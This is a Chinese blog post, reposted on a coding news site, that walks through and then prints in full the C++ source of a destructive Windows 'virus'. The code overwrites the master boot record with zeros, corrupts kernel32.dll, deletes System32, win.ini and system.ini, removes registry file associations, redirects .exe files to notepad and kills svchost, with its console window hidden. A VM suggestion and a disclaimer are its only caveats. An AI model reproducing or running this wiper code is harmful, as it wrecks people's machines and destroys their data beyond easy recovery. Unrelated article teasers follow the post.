C++破坏电脑病毒

写了这么多python病毒,今天我来给大家分享一个C++病毒。

 

创作背景:我有个同学对电脑十分精通,而且对MBR十分感兴趣,他跟我分享了他怎么把MBR搞报废的历程。听完之后,我开始研究MBR。用python研究了2个月,结果做的是无用功。知道我这个月学了C++!我学会了如何破坏MBR!于是我开始做这款超强病毒。做了2天(一直在调试,把病毒弄到最佳状态)。

IDE:visual studio 2022

功能:感染kernel32.dll、删除system32、win.ini、system.ini、删除所有注册表、修改exe打开方式、修改MBR

修复方法:用PE修复引导,恢复丢失的文件,修复文件打开方式(或重装系统)

第一步,把头文件给导入进来。

#include <stdio.h>
#include <iostream>
#include <Windows.h>

然后做点设置

#define _CRT_SECURE_NO_WARNINGS 1 //跳过安全检查
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏dos窗口

然后做修改MBR函数

void kill_mbr()//修改MBR
{FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");char mbr[512] = { 0 };fwrite(mbr, sizeof(mbr), 1, disk);fclose(disk);
}

做感染kernel32.dll函数

void infect()//感染kernel32.dll
{FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");char write[666] = { 0 };fwrite(write, sizeof(write), 1, infect_file);fclose(infect_file);
}

然后是其他功能的代码

system("del /f /s /q C:\\Windows\\System32\\*.*");//删除system32
system("ftype exefile='C:\\Windows\\notepad.exe'%*");  //把可执行文件的打开方式都改成notepad
system("@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*");//删除所有注册表
system("attrib -s -r -h C:\\Windows\\system.ini");
system("del /f /s /q C:\\Windows\\system.ini");
system("attrib -s -r -h C:\\Windows\\win.ini");
system("del /f /s /q C:\\Windows\\win.ini"); //删除系统重要文件

对了,还要终止系统进程

system("taskkill /f /im svchost.exe");

然后这样的话运行之后直接蓝屏死机,连修复时间都基本没有~

总代码

#define _CRT_SECURE_NO_WARNINGS 1 //跳过安全检查
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏dos窗口
#include <stdio.h>
#include <iostream>
#include <Windows.h>
using namespace std;
void kill_mbr()//修改MBR
{FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");char mbr[512] = { 0 };fwrite(mbr, sizeof(mbr), 1, disk);fclose(disk);
}
void infect()//感染kernel32.dll
{FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");char write[666] = { 0 };fwrite(write, sizeof(write), 1, infect_file);fclose(infect_file);
}
int main()
{infect();kill_mbr();system("del /f /s /q C:\\Windows\\System32\\*.*");//删除system32system("ftype exefile='C:\\Windows\\notepad.exe'%*");  //把可执行文件的打开方式都改成notepadsystem("@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*");//删除所有注册表system("attrib -s -r -h C:\\Windows\\system.ini");system("del /f /s /q C:\\Windows\\system.ini");system("attrib -s -r -h C:\\Windows\\win.ini");system("del /f /s /q C:\\Windows\\win.ini"); //删除系统重要文件system("taskkill /f /im svchost.exe");return 0;
}

火绒报毒这是木马(好几次了)

我都生成不了程序了都...... 

以上就是病毒代码,如要使用,请用虚拟机。下载研究后请严禁用于非法用途,使用本文件产生的一切后果由下载者自行承担,谢谢!

请多多提建议,我会继续改进的!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/49714.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

GEE-PIE遥感大数据处理技术

GEE-PIE遥感大数据处理技术

随着航空、航天、近地空间等多个遥感平台的不断发展&#xff0c;近年来遥感技术突飞猛进。由此&#xff0c;遥感数据的空间、时间、光谱分辨率不断提高&#xff0c;数据量也大幅增长&#xff0c;使其越来越具有大数据特征。对于相关研究而言&#xff0c;遥感大数据的出现为其提…
阅读更多...
Mac上传项目源代码到GitHub的修改更新

Mac上传项目源代码到GitHub的修改更新

Mac上传项目源代码到GitHub的修改更新 最近在学习把代码上传到github&#xff0c;不得不说&#xff0c;真的还挺方便 这是一个关于怎样更新项目代码的教程。 首先&#xff0c;在本地终端命令行打开至项目文件下第一步&#xff1a;查看当前的git仓库状态&#xff0c;可以使用git…
阅读更多...
Python Jail 沙盒逃逸 合集

Python Jail 沙盒逃逸 合集

原理 沙箱是一种安全机制&#xff0c;用于在受限制的环境中运行未信任的程序或代码。它的主要目的是防止这些程序或代码影响宿主系统或者访问非授权的数据。 在 Python 中&#xff0c;沙箱主要用于限制 Python 代码的能力&#xff0c;例如&#xff0c;阻止其访问文件系统、网…
阅读更多...
Django实现音乐网站 ⑿

Django实现音乐网站 ⑿

使用Python Django框架制作一个音乐网站&#xff0c; 本篇主要是加载静态资源和推荐页-轮播图、推荐歌单功能开发。 目录 加载静态资源 引入jquery.js 引入bootstrap资源文件 创建基类模板样式文件 推荐页开发 轮播图开发 下载 加载swiper 自定义引入继承块设置 使用…
阅读更多...
npm install 安装依赖,报错 Host key verification failed

npm install 安装依赖,报错 Host key verification failed

设置 git 的身份和邮箱 git config --global user.name "你的名字" > 用户名 git config --global user.email “你的邮箱" > 邮箱进入 > 用户 > [你的用户名] > .ssh文件夹下,删除 known_hosts 文件即可 进入之后有可能会看到 known_hosts…
阅读更多...
android外卖点餐界面(期末作业)

android外卖点餐界面(期末作业)

效果展示&#xff1a; AndroidMainFest.xml <?xml version"1.0" encoding"utf-8"?> <manifest xmlns:android"http://schemas.android.com/apk/res/android"xmlns:tools"http://schemas.android.com/tools"><a…
阅读更多...
Vue使用Element的表格Table显示树形数据,多选框全选无法选中全部节点

Vue使用Element的表格Table显示树形数据,多选框全选无法选中全部节点

使用Element的组件Table表格&#xff0c;当使用树形数据再配合上多选框&#xff0c;如下&#xff1a; 会出现一种问题&#xff0c;点击左上方全选&#xff0c;只能够选中一级树节点&#xff0c;子节点无法被选中&#xff0c;如图所示&#xff1a; 想要实现点击全选就选中所有的…
阅读更多...
IDEA中导出Javadoc遇到的GBK编码错误的解决思路和应用

IDEA中导出Javadoc遇到的GBK编码错误的解决思路和应用

IDEA中导出Javadoc遇到的GBK编码错误的解决思路和应用 ​ 当我们在导出自己写的项目的api文档的时候呢&#xff0c;有的时候会出现以下问题&#xff1a;也就是GBK编码错误不可导出 错误描述&#xff1a;编码GBK的不可映射字符无法导出&#xff0c;可以看出这是我们自己写的中文…
阅读更多...
Ansible学习笔记(二)

Ansible学习笔记(二)

3.ansible的使用示例&#xff08;playbook&#xff09; 1.创建mysql 账户和mysql 组的 playbook ---#create mysql user and group - hosts: allremote_user: roottasks:- name: create groupgroup: namemysql systemyes gid306- name: create useruser: namemysql systemyes…
阅读更多...
webpack 从入门到放弃!

webpack 从入门到放弃!

webpack webpack于2012年3月10号诞生&#xff0c;作者是Tobias(德国)。参考GWT(Google Web Toolkit)的code splitting功能在webpack中进行实现。然后在2014年Instagram团队分享性能优化时&#xff0c;提出使用webpack的code splitting特性从而大火。 现在webpack的出现模糊了任…
阅读更多...
快速提高写作生产力——使用PicGo+Github搭建免费图床,并结合Typora

快速提高写作生产力——使用PicGo+Github搭建免费图床,并结合Typora

文章目录 简述PicGo下载PicGo获取Token配置PicGo结合Typora总结 简述PicGo PicGo: 一个用于快速上传图片并获取图片 URL 链接的工具 PicGo 本体支持如下图床&#xff1a; 七牛图床 v1.0腾讯云 COS v4\v5 版本 v1.1 & v1.5.0又拍云 v1.2.0GitHub v1.5.0SM.MS V2 v2.3.0-b…
阅读更多...
drools8尝试(加单元测试)

drools8尝试(加单元测试)

drools8的maven模板项目里没有单元测试, 相比而言drools7有个非常好的test senorios 那就自己弄一个 文件是.http后缀的,写了个简单的例子如下 //测试交通违章 POST http://localhost:8080/Traffic Violation accept: application/json Content-Type: application/json{&q…
阅读更多...
代码pytorch-adda-master跑通记录

代码pytorch-adda-master跑通记录

前言 最近在学习迁移学习&#xff0c;ADDA算法&#xff0c;由于嫌自己写麻烦&#xff0c;准备先跑通别人的代码。 代码名称&#xff1a;pytorch-adda-master 博客&#xff1a;https://www.cnblogs.com/BlairGrowing/p/17020378.html github地址&#xff1a;https://github.com…
阅读更多...
数据备份(手动备份与自动备份)

数据备份(手动备份与自动备份)

目录 1. 手动备份 1.使用Windows ServerBackup管理控制台手动备份 2.使用命令行工具手动备份 2. 自动备份 3 备份设置 1.普通备份性能 2.快速备份性能 3.自定义 1. 手动备份 案例9.1某公司有一台WindowsServer2016文件服务器&#xff0c;公司的很多重要文件都保存在新加卷…
阅读更多...
恢复NuGet包_解决:System.BadImageFormatException:无法加载文件或程序集

恢复NuGet包_解决:System.BadImageFormatException:无法加载文件或程序集

C#工程 主要是开发了一个 web api接口&#xff0c;这个工程源码去年还可以的&#xff0c;今年换了一个电脑打开工程就报错。 错误提示如下&#xff1a; 在 Microsoft.CodeAnalysis.CSharp.CommandLine.Program.Main(String[] args) Test1 System.BadImageFormatEx…
阅读更多...
一、数据库基础

一、数据库基础

数据库 一、数据库基础 1、一些概念 数据库&#xff1a;数据库&#xff08;DataBase &#xff0c;简称DB&#xff09;&#xff0c;就是信息的集合。数据库是由数据库管理系统管理的数据的集合&#xff1b;数据库管理系统&#xff1a;简称DBMS 。是一种操纵和管理数据库的大型…
阅读更多...
【附安装包】Tecplot 360 EX2022安装教程

【附安装包】Tecplot 360 EX2022安装教程

软件下载 软件&#xff1a;Tecplot 360版本&#xff1a;2022语言&#xff1a;英文大小&#xff1a;388.97M安装环境&#xff1a;Win11/Win10/Win8/Win7硬件要求&#xff1a;CPU2.5GHz 内存4G(或更高&#xff09;下载通道①百度网盘丨64位下载链接&#xff1a;https://pan.baid…
阅读更多...
Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全

Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 全

Ctfshow 命令执行 web29 pregmatch是正则匹配函数&#xff0c;匹配是否包含flag&#xff0c;if(!preg_match("/flag/i", $c))&#xff0c;/i忽略大小写 可以利用system来间接执行系统命令 flag采用f*绕过&#xff0c;或者mv fl?g.php 1.txt修改文件名&#xff0c…
阅读更多...
DDD 架构分层,MQ消息要放到那一层处理?

DDD 架构分层,MQ消息要放到那一层处理?

作者&#xff1a;小傅哥 博客&#xff1a;https://bugstack.cn 沉淀、分享、成长&#xff0c;让自己和他人都能有所收获&#xff01;&#x1f604; 本文的宗旨在于通过简单干净实践的方式教会读者&#xff0c;使用 Docker 配置 RocketMQ 并在基于 DDD 分层结构的 SpringBoot 工…
阅读更多...
多个微信号怎么快速发圈、自动加好友、自动回复?

多个微信号怎么快速发圈、自动加好友、自动回复?

一键助你快速发圈、批量自动加好友、自动回复&#xff0c;好用哭了&#xff01; 微信管理系统是一个聚合管理多个微信账号的利器&#xff0c;让你的微信管理变得简单高效。不管你是电商、微商&#xff0c;还是拥有多个微信号的用户&#xff0c;这一款微信管理软件都可以满足你的…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023